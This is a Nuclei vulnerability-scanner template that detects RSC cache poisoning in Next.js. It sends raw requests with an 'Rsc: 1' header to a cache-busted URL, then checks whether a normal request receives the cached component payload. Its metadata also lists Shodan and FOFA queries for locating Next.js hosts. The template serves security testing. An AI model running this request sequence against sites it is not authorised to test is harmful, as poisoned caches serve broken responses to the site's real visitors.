id: nextjs-rsc-cache

info:
  name: Next.js - Cache Poisoning
  author: DhiyaneshDk
  severity: high
  description: |
     Next.js is vulnerable to Cache Poisoning using RSC.
  reference:
    - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole
  metadata:
    verified: true
    vendor: vercel
    product: next.js
    framework: node.js
    shodan-query:
      - http.html:"/_next/static"
      - cpe:"cpe:2.3:a:zeit:next.js"
    fofa-query: body="/_next/static"
  tags: nextjs,cache

variables:
  rand: "{{rand_text_numeric(5)}}"

http:
  - raw:
      - |
        GET /?cb={{rand}} HTTP/1.1
        Host: {{Hostname}}
        Priority: u=1
        Rsc: 1

      - |
        @timeout: 10s
        GET /?cb={{rand}} HTTP/1.1
        Host: {{Hostname}}
        Priority: u=1
        Rsc: 1

      - |
        @timeout: 10s
        GET /?cb={{rand}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 200 && contains(content_type_2, 'text/x-component')"
          - "status_code_3 == 200 && contains(content_type_3, 'text/x-component')"
        condition: and
# digest: 4a0a0047304502204ed973cfb9843fd79d0b341b5bf2d36a17a5dd10270bb3114b2b3846b9a3fa3c022100a64054e6356d0cca61ed26edaa0fb3625aed1e09512172a1497cc2ad551ad467:922c64590222798bb761d5b6d8e72950